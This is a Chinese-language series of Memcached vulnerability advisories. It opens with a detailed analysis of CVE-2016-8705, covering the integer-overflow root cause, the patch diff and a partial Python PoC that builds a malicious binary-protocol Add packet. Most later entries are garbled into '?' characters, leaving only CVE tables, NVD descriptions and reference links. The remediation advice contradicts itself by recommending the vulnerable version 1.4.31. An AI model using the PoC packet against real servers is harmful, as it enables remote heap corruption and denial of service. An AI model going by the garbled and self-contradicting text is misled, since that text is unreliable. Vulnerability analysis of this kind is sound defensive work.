一、漏洞简介¶

1.1 漏洞背景¶

CVE-2016-8705 同样由 Cisco Talos 安全团队于 2016 年 10 月披露。该漏洞位于 process_bin_update 函数中，影响 Memcached 二进制协议的 Set、Add、Replace 等核心操作。由于这些操作是缓存系统最常用的功能，漏洞影响面更广。

1.2 漏洞概述（包含 CVE 编号、危害等级、漏洞类型、披露时间等）¶

项目	内容
漏洞编号	CVE-2016-8705
危害等级	CRITICAL / 9.8
漏洞类型	整数溢出漏洞
披露时间	2017-01-06
影响组件	Memcached 安全

属性	描述
CVE编号	CVE-2016-8705
危害等级	严重
CVSS评分	9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
漏洞类型	整数溢出导致堆溢出
CWE编号	CWE-190 (Integer Overflow or Wraparound)
影响组件	process_bin_update 函数

补充核验信息：公开时间：2017-01-06；NVD 评分：9.8（CRITICAL）；CWE：CWE-190。

二、影响范围¶

2.1 受影响的版本¶

Memcached 1.4.31 及更早版本

2.2 不受影响的版本¶

Memcached 1.4.32 及更高版本

2.3 触发条件（如特定模块、特定配置、特定运行环境等）¶

Memcached 启用二进制协议（默认启用）
攻击者能够直接连接 Memcached 服务
使用以下操作码：
Set (opcode 0x01)
Add (opcode 0x02)
Replace (opcode 0x03)
SetQ (opcode 0x11)
AddQ (opcode 0x12)
ReplaceQ (opcode 0x13)

三、漏洞详情与原理解析¶

3.1 漏洞触发机制¶

// memcached.c - process_bin_update 函数
static void process_bin_update(conn *c) {
    char *key;
    int nkey;    // [1] 有符号整数
    int vlen;    // [2] 有符号整数
    item *it;
    protocol_binary_request_set* req = binary_get_request(c);

    assert(c != NULL);

    key = binary_get_key(c);
    nkey = c->binary_header.request.keylen;

    // 处理字节序
    req->message.body.flags = ntohl(req->message.body.flags);
    req->message.body.expiration = ntohl(req->message.body.expiration);

    // [3] 溢出点：bodylen 是无符号，vlen 是有符号
    vlen = c->binary_header.request.bodylen - (nkey + c->binary_header.request.extlen);

    // ...

    it = item_alloc(key, nkey, req->message.body.flags,
                    realtime(req->message.body.expiration), vlen+2);
}

溢出原理： - bodylen 是 uint32_t（无符号） - vlen 是 int（有符号） - 当 bodylen < (nkey + extlen) 时，差值为负 - 负值赋给有符号的 vlen

3.2 源码层面的根因分析（结合源码与补丁对比）¶

dispatch_bin_command 中的初步检查：

// memcached.c
case PROTOCOL_BINARY_CMD_SET:
case PROTOCOL_BINARY_CMD_ADD:
case PROTOCOL_BINARY_CMD_REPLACE:
    if (extlen == 8 && keylen != 0 && bodylen >= (keylen + 8)) {
        // [1] 这个检查存在整数提升问题
        bin_read_key(c, bin_reading_set_header, 8);
    } else {
        protocol_error = 1;
    }
    break;

问题分析： - 检查 bodylen >= (keylen + 8) 中，keylen 是 int，bodylen 是 uint32_t - 整数提升导致比较以无符号方式进行 - 但在 process_bin_update 中计算 vlen 时，结果赋给有符号整数

触发条件计算：

bodylen = 0xFFFFFFD0 (4294967248)
keylen = 0xFA (250)
extlen = 8

检查: bodylen >= (keylen + 8)  →  4294967248 >= 258  →  通过！

计算 vlen:
vlen = bodylen - (keylen + extlen)
     = 0xFFFFFFD0 - (250 + 8)
     = 0xFFFFFFD0 - 258
     = 0xFFFFFFCE (作为无符号)
     = -306 (作为有符号 int)

补丁对比：

 static void process_bin_update(conn *c) {
     char *key;
     int nkey;
     int vlen;
     item *it;
     protocol_binary_request_set* req = binary_get_request(c);

     assert(c != NULL);

     key = binary_get_key(c);
     nkey = c->binary_header.request.keylen;

     req->message.body.flags = ntohl(req->message.body.flags);
     req->message.body.expiration = ntohl(req->message.body.expiration);

     vlen = c->binary_header.request.bodylen - (nkey + c->binary_header.request.extlen);

+    if (vlen < 0) {
+        write_bin_error(c, PROTOCOL_BINARY_RESPONSE_EINVAL, NULL, vlen);
+        c->write_and_go = conn_swallow;
+        return;
+    }
+

四、漏洞复现（可选）¶

4.1 环境搭建¶

与 CVE-2016-8704 相同，使用 Memcached 1.4.31 版本。

4.2 PoC 演示与测试过程¶

Python PoC：

```python

!/usr/bin/env python3¶

""" CVE-2016-8705 PoC Memcached process_bin_update Integer Overflow """ import struct import socket import sys

def build_malicious_add_packet(): # 构造触发溢出的 Add 命令 MEMCACHED_REQUEST_MAGIC = b"\x80" OPCODE_ADD = b"\x02" # Add 操作码

# 关键参数
key_len = struct.pack("!H", 0xfa)      # 250 字节 key
extra_len = b"\x08"                     # 必须是 8 (flags + expiration)
data_type = b"\x00"
vbucket = b"\x00\x00"
# 触发溢出的 body_len
body_len = struct.pack("!I", 0xffffffd0)
opaque = struct.pack("!I", 0)
CAS = struct.pack("!Q", 0)

# 构造 extras (flags + expiration)
extras_flags = struct.pack("!I", 0xdeadbeef)
extras_expiry = struct.pack("!I", 0xe10)

# 构造完整包
packet = (MEMCACHED_REQUEST_MAGIC + OPCODE_ADD +
          key_len + extra_len + data_type + vbucket +
          body_len + opaque + CAS +
          extras_flags + extras_expiry)

# 添加大量数据
body = b"A" * 1024
packet += body

五、修复建议与缓解措施¶

5.1 官方版本升级建议¶

优先升级到 1.4.31 或同等后续安全版本。
升级前请结合官方发布说明确认兼容性与回滚方案。

5.2 临时缓解方案（如修改配置文件、关闭相关模块、增加 WAF 规则等）¶

在完成版本升级前，建议将相关服务限制在可信网络边界内，并最小化暴露面。
对高风险接口、插件或调试功能实施临时下线、访问控制与日志监控。

六、参考信息 / 参考链接¶

6.1 官方安全通告¶

暂未找到可直接引用的官方安全通告，请优先关注项目安全公告、发布说明与修复分支。

6.2 其他技术参考资料¶

NVD：https://nvd.nist.gov/vuln/detail/CVE-2016-8705
CVE：https://www.cve.org/CVERecord?id=CVE-2016-8705
http://rhn.redhat.com/errata/RHSA-2016-2819.html
http://rhn.redhat.com/errata/RHSA-2016-2820.html
http://www.debian.org/security/2016/dsa-3704
http://www.securityfocus.com/bid/94083
http://www.securitytracker.com/id/1037333

<hr />

Memcached ???????CVE-2011-4971?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2011-4971 ??????????? 2026-03-22 ?????????????? MEDIUM?CVSS 5.0?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2011-4971
????	MEDIUM
CVSS ??	5.0
????	CWE-189
????	2013-12-12
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:*, <= 1.4.5
memcached:memcached:1.2.7
memcached:memcached:1.2.8
memcached:memcached:1.4.0
memcached:memcached:1.4.1
memcached:memcached:1.4.2
memcached:memcached:1.4.3
memcached:memcached:1.4.4

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_append_prepend functions in Memcached 1.4.5 and earlier allow remote attackers to cause a denial of service (crash) via a large body length value in a packet.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-189?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2011-4971
https://www.cve.org/CVERecord?id=CVE-2011-4971
http://insecurety.net/?p=872
http://secunia.com/advisories/56183
http://www.debian.org/security/2014/dsa-2832
http://www.mandriva.com/security/advisories?name=MDVSA-2013:280
http://www.securityfocus.com/bid/59567
http://www.ubuntu.com/usn/USN-2080-1

<hr />

Memcached ???????CVE-2013-0179?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2013-0179 ??????????? 2026-03-22 ?????????????? LOW?CVSS 1.8?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2013-0179
????	LOW
CVSS ??	1.8
????	CWE-119
????	2014-01-13
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:1.4.4
memcached:memcached:1.4.5
memcached:memcached:1.4.6
memcached:memcached:1.4.7
memcached:memcached:1.4.8
memcached:memcached:1.4.9
memcached:memcached:1.4.10
memcached:memcached:1.4.11

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????The process_bin_delete function in memcached.c in memcached 1.4.4 and other versions before 1.4.17, when running in verbose mode, allows remote attackers to cause a denial of service (segmentation fault) via a request to delete a key, which does not account for the lack of a null terminator in the key and triggers a...
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-119?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2013-0179
https://www.cve.org/CVERecord?id=CVE-2013-0179
http://secunia.com/advisories/56183
http://www.openwall.com/lists/oss-security/2013/01/14/4
http://www.openwall.com/lists/oss-security/2013/01/14/6
http://www.securityfocus.com/bid/64978
http://www.ubuntu.com/usn/USN-2080-1
https://bugzilla.redhat.com/show_bug.cgi?id=895054

<hr />

Memcached ???????CVE-2013-7239?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2013-7239 ??????????? 2026-03-22 ?????????????? MEDIUM?CVSS 4.8?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2013-7239
????	MEDIUM
CVSS ??	4.8
????	CWE-287
????	2014-01-13
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:*, <= 1.4.16
memcached:memcached:1.4.0
memcached:memcached:1.4.1
memcached:memcached:1.4.2
memcached:memcached:1.4.3
memcached:memcached:1.4.4
memcached:memcached:1.4.5
memcached:memcached:1.4.6

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????memcached before 1.4.17 allows remote attackers to bypass authentication by sending an invalid request with SASL credentials, then sending another request with incorrect SASL credentials.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-287?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2013-7239
https://www.cve.org/CVERecord?id=CVE-2013-7239
http://seclists.org/oss-sec/2013/q4/572
http://secunia.com/advisories/56183
http://www.debian.org/security/2014/dsa-2832
http://www.securityfocus.com/bid/64559
http://www.ubuntu.com/usn/USN-2080-1
https://code.google.com/p/memcached/wiki/ReleaseNotes1417

<hr />

Memcached ???????CVE-2013-7290?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2013-7290 ??????????? 2026-03-22 ?????????????? LOW?CVSS 1.8?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2013-7290
????	LOW
CVSS ??	1.8
????	CWE-119
????	2014-01-13
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:1.4.4
memcached:memcached:1.4.5
memcached:memcached:1.4.6
memcached:memcached:1.4.7
memcached:memcached:1.4.8
memcached:memcached:1.4.9
memcached:memcached:1.4.10
memcached:memcached:1.4.11

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????The do_item_get function in items.c in memcached 1.4.4 and other versions before 1.4.17, when running in verbose mode, allows remote attackers to cause a denial of service (segmentation fault) via a request to delete a key, which does not account for the lack of a null terminator in the key and triggers a buffer ove...
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-119?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2013-7290
https://www.cve.org/CVERecord?id=CVE-2013-7290
http://www.securityfocus.com/bid/64988
https://code.google.com/p/memcached/issues/detail?id=306
https://code.google.com/p/memcached/wiki/ReleaseNotes1417

<hr />

Memcached ???????CVE-2013-7291?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2013-7291 ??????????? 2026-03-22 ?????????????? LOW?CVSS 1.8?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2013-7291
????	LOW
CVSS ??	1.8
????	CWE-119
????	2014-01-13
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:*, <= 1.4.16
memcached:memcached:1.4.0
memcached:memcached:1.4.1
memcached:memcached:1.4.2
memcached:memcached:1.4.3
memcached:memcached:1.4.4
memcached:memcached:1.4.5
memcached:memcached:1.4.6

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????memcached before 1.4.17, when running in verbose mode, allows remote attackers to cause a denial of service (crash) via a request that triggers an "unbounded key print" during logging, related to an issue that was "quickly grepped out of the source tree," a different vulnerability than CVE-2013-0179 and CVE-2013-7290.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-119?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2013-7291
https://www.cve.org/CVERecord?id=CVE-2013-7291
http://www.securityfocus.com/bid/64989
https://code.google.com/p/memcached/issues/detail?id=306
https://code.google.com/p/memcached/wiki/ReleaseNotes1417

<hr />

Memcached ???????CVE-2016-8706?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2016-8706 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 8.1?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2016-8706
????	HIGH
CVSS ??	8.1
????	CWE-190
????	2017-01-06
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:*, <= 1.4.31

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-190?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2016-8706
https://www.cve.org/CVERecord?id=CVE-2016-8706
http://rhn.redhat.com/errata/RHSA-2016-2819.html
http://www.debian.org/security/2016/dsa-3704
http://www.securityfocus.com/bid/94083
http://www.securitytracker.com/id/1037333
http://www.talosintelligence.com/reports/TALOS-2016-0221/
https://security.gentoo.org/glsa/201701-12

<hr />

Memcached ???????CVE-2017-9951?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2017-9951 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.5?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2017-9951
????	HIGH
CVSS ??	7.5
????	NVD-CWE-noinfo
????	2017-07-17
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:*, <= 1.4.38

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????The try_read_command function in memcached.c in memcached before 1.4.39 allows remote attackers to cause a denial of service (segmentation fault) via a request to add/set a key, which makes a comparison between signed and unsigned int and triggers a heap-based buffer over-read. NOTE: this vulnerability exists becaus...
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????NVD-CWE-noinfo?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2017-9951
https://www.cve.org/CVERecord?id=CVE-2017-9951
http://www.securityfocus.com/bid/99874
https://github.com/memcached/memcached/wiki/ReleaseNotes1439
https://groups.google.com/forum/message/raw?msg=memcached/ubGWrkmrr4E/nrm1SeVJAQAJ
https://usn.ubuntu.com/3588-1/
https://www.debian.org/security/2018/dsa-4218
https://www.twistlock.com/2017/07/13/cve-2017-9951-heap-overflow-memcached-server-1-4-38-twistlock-vulnerability-report/

<hr />

Memcached ???????CVE-2018-1000115?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2018-1000115 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.5?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2018-1000115
????	HIGH
CVSS ??	7.5
????	CWE-400
????	2018-03-05
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:1.5.5
canonical:ubuntu_linux:14.04
canonical:ubuntu_linux:16.04
canonical:ubuntu_linux:17.10
debian:debian_linux:8.0
debian:debian_linux:9.0
redhat:openstack:8
redhat:openstack:9

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????Memcached version 1.5.5 contains an Insufficient Control of Network Message Volume (Network Amplification, CWE-406) vulnerability in the UDP support of the memcached server that can result in denial of service via network flood (traffic amplification of 1:50,000 has been reported by reliable sources). This attack ap...
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-400?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2018-1000115
https://www.cve.org/CVERecord?id=CVE-2018-1000115
https://access.redhat.com/errata/RHBA-2018:2140
https://access.redhat.com/errata/RHSA-2018:1593
https://access.redhat.com/errata/RHSA-2018:1627
https://access.redhat.com/errata/RHSA-2018:2331
https://access.redhat.com/errata/RHSA-2018:2857
https://blogs.akamai.com/2018/03/memcached-fueled-13-tbps-attacks.html

<hr />

Memcached ???????CVE-2018-1000127?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2018-1000127 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.5?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2018-1000127
????	HIGH
CVSS ??	7.5
????	CWE-190?CWE-667
????	2018-03-13
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:*, < 1.4.37
debian:debian_linux:7.0
debian:debian_linux:8.0
debian:debian_linux:9.0
canonical:ubuntu_linux:14.04
canonical:ubuntu_linux:16.04
canonical:ubuntu_linux:17.10
redhat:openstack:10

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????memcached version prior to 1.4.37 contains an Integer Overflow vulnerability in items.c:item_free() that can result in data corruption and deadlocks due to items existing in hash table being reused from free list. This attack appear to be exploitable via network connectivity to the memcached service. This vulnerabil...
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-190?CWE-667?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2018-1000127
https://www.cve.org/CVERecord?id=CVE-2018-1000127
https://access.redhat.com/errata/RHSA-2018:2290
https://github.com/memcached/memcached/commit/a8c4a82787b8b6c256d61bd5c42fb7f92d1bae00
https://github.com/memcached/memcached/issues/271
https://github.com/memcached/memcached/wiki/ReleaseNotes1437
https://lists.debian.org/debian-lts-announce/2018/03/msg00031.html
https://usn.ubuntu.com/3601-1/

<hr />

Memcached ???????CVE-2019-11596?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2019-11596 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.5?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2019-11596
????	HIGH
CVSS ??	7.5
????	CWE-476
????	2019-04-29
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:*, < 1.5.14
canonical:ubuntu_linux:18.04
canonical:ubuntu_linux:18.10
canonical:ubuntu_linux:19.04

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????In memcached before 1.5.14, a NULL pointer dereference was found in the "lru mode" and "lru temp_ttl" commands. This causes a denial of service when parsing crafted lru command messages in process_lru_command in memcached.c.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-476?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2019-11596
https://www.cve.org/CVERecord?id=CVE-2019-11596
http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00060.html
https://github.com/memcached/memcached/commit/d35334f368817a77a6bd1f33c6a5676b2c402c02
https://github.com/memcached/memcached/compare/ee1cfe3...50bdc9f
https://github.com/memcached/memcached/issues/474
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UUE3QBMP5UWTXMPKJREUICH6DIK6SOBX/
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Y2CCWRM4LHB253KG5SPOKRVDCXQX5VZR/

<hr />

Memcached ???????CVE-2019-15026?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2019-15026 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.5?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2019-15026
????	HIGH
CVSS ??	7.5
????	CWE-125
????	2019-08-30
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:1.5.16

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????memcached 1.5.16, when UNIX sockets are used, has a stack-based buffer over-read in conn_to_str in memcached.c.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-125?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2019-15026
https://www.cve.org/CVERecord?id=CVE-2019-15026
http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00060.html
https://github.com/memcached/memcached/commit/554b56687a19300a75ec24184746b5512580c819
https://github.com/memcached/memcached/wiki/ReleaseNotes1517
https://lists.debian.org/debian-lts-announce/2019/09/msg00006.html
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOD422IS2OPXRDID5EKFZHFUHK2BLQGJ/
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FYGUBOEM5HX4GRMWVEKOJUFICF77ME47/

<hr />

Memcached ???????CVE-2020-10931?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2020-10931 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.5?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2020-10931
????	HIGH
CVSS ??	7.5
????	CWE-120
????	2020-03-24
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:*, >= 1.6.0, < 1.6.2

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????Memcached 1.6.x before 1.6.2 allows remote attackers to cause a denial of service (daemon crash) via a crafted binary protocol header to try_read_command_binary in memcached.c.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-120?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2020-10931
https://www.cve.org/CVERecord?id=CVE-2020-10931
https://github.com/memcached/memcached/commit/02c6a2b62ddcb6fa4569a591d3461a156a636305
https://github.com/memcached/memcached/issues/629
https://github.com/memcached/memcached/wiki/ReleaseNotes162

<hr />

Memcached ???????CVE-2020-22570?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2020-22570 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.5?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2020-22570
????	HIGH
CVSS ??	7.5
????	CWE-77
????	2023-08-22
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:*, >= 1.6.0, < 1.6.3

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????Memcached 1.6.0 before 1.6.3 allows remote attackers to cause a denial of service (daemon crash) via a crafted meta command.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-77?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2020-22570
https://www.cve.org/CVERecord?id=CVE-2020-22570
https://github.com/memcached/memcached/issues/636

<hr />

Memcached ???????CVE-2021-37519?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2021-37519 ??????????? 2026-03-22 ?????????????? MEDIUM?CVSS 5.5?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2021-37519
????	MEDIUM
CVSS ??	5.5
????	CWE-787
????	2023-02-03
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:1.6.9

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????Buffer Overflow vulnerability in authfile.c memcached 1.6.9 allows attackers to cause a denial of service via crafted authenticattion file.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-787?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2021-37519
https://www.cve.org/CVERecord?id=CVE-2021-37519
https://github.com/memcached/memcached/issues/805
https://github.com/memcached/memcached/pull/806/commits/264722ae4e248b453be00e97197dadc685b60fd0

<hr />

Memcached ???????CVE-2022-48571?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2022-48571 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.5?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2022-48571
????	HIGH
CVSS ??	7.5
????	CWE-400
????	2023-08-22
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:1.6.7

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????memcached 1.6.7 allows a Denial of Service via multi-packet uploads in UDP.
